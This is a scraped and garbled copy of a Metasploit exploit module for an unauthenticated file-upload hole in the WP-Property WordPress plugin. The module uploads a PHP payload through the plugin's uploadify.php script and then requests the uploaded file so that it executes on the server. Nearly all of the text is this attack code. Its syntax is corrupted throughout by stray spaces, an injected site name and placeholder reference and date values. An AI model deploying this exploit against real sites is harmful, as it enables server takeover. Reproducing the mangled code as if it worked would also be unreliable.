WordPress WP-Property PHP file Upload Vulnerability ### This file is part of the Metasploit Framework and may be subject to # redistribution and other cial restrictions. please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # Require 'msf/core' require 'msf/core/exploit/php_exe 'class Metasploit3 <msf: Exploit: Remote Rank = ExcellentRanking include msf: Exploit: Remote:: HttpClient include Msf: Exploit: PhpEXE def initialize (info ={}) super (update_info (info, 'name' => 'wordpress WP-Property PHP File Upload Vulnerability ', 'description' => % q {This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. by abusing the uploadify. php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution .}, 'author' => ['Sammy FORGIT ', # initial discovery' James Fitts <fitts. james [at] gmail.com> '# metasploit module], 'license' => MSF_LICENSE, 'references '=> [['ossvdb', '123'], ['bid ', '123'], ['edb', '123'], ['url ',' http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html '], 'Payload' =>{ 'badchars' => "\ x00" ,}, 'platform' => 'php', 'arch' => ARCH_PHP, 'targets' => [['generic (PHP Payload) ', {'arch' => ARCH_PHP, 'Platform '=> 'php'}], ['linux x86 ', {'arch '=> ARCH_X86, 'Platform' => 'linux '}], 'defaulttarget' => 0, 'disclosuredate' => 'mar 26 123456 ')) register_options ([OptString. new ('targeturi ', [true, 'the full URI path to wordpress','/wordpress'])], self. class) End def checkuri = target_uri.pathuri <'/' if uri [-1, 1]! = '/' Res = send_request_cgi ({'method' => 'get ', 'uris '=> "# {uri} wp-content/plugins/wp-property/third-party/uploadify. php "}) if not res or res. code! = 200 return Exploit: CheckCode: Unknownend return Exploit: CheckCode: Appearsendwww.2cto. comdef exploituri = target_uri.pathuri <'/'if uri [-]! = '/' Peer = "# {rhost }:# {rport}" @ payload_name = "# {rand_text_alpha (5 )}. php "php_payload = get_write_exec_payload (: unlink_self => true) data = Rex: MIME: Message. newdata. add_part (php_payload, "application/octet-stream", nil, "form-data; name = \" Filedata \ "; filename = \" #{@ payload_name }\"") data. add_part ("# {uri} wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name = \ "folder \"") Post_data = data. to_s.gsub (/^ \ r \ n \-\ _ Part \ _/, '-- _ Part _') print_status ("# {peer}-Uploading payload # {@ payload_name}") res = send_request_cgi ({'method' => 'post ', 'uris '=> "# {uri} wp-content/plugins/wp-property/third-party/uploadify. php ", 'ctype '=>" multipart/form-data; boundary = # {data. bound} ", 'data' => post_data}) if not res or res. code! = 200 or res. body !~ /# {@ Payload_name}/fail_with (Exploit: Failure: UnexpectedReply, "# {peer}-Upload failed") end upload_uri = res. body print_status ("# {peer}-Executing payload # {@ payload_name}") res = send_request_raw ({'uris '=> upload_uri, 'method' => 'get '}) endend: Don't ask me what I wrote here. How can I use it? I mean msf. from: http://www.exploit-db.com/exploits/23651/